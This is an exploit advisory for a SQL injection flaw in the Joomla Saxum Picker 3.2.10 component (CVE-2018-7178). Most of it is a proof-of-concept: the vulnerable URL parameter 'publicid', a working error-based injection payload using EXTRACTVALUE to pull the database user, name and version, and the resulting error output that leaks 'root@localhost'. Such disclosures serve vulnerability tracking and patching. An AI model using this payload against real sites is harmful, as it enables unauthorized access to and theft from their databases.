# # # # # # Exploit Title: Joomla! Component Saxum Picker 3.2.10 - SQL Injection # Dork: N/A # Date: 16.02.2018 # Vendor Homepage: http://www.saxum2003.hu/ # Software Link: https://extensions.joomla.org/extensions/extension/sports-a-games/games/saxumpicker/ # Software Download: http://www.saxum2003.hu/downloadsen/file/97-picker32.html # Version: 3.2.10 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2018-7178 # # # # # # Exploit Author: Ihsan Sencan # # # # # # # POC: # # 1) # http://localhost/[PATH]/index.php?option=com_saxumpicker&view=savedspread&publicid=[SQL] # # # # # # http://localhost/Joomla375/index.php?option=com_saxumpicker&view=savedspread&publicid=1' AND EXTRACTVALUE(66,CONCAT(0x5c,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1)))))-- - 1105 XPATH syntax error: '\root@localhost : joomla375 : 10'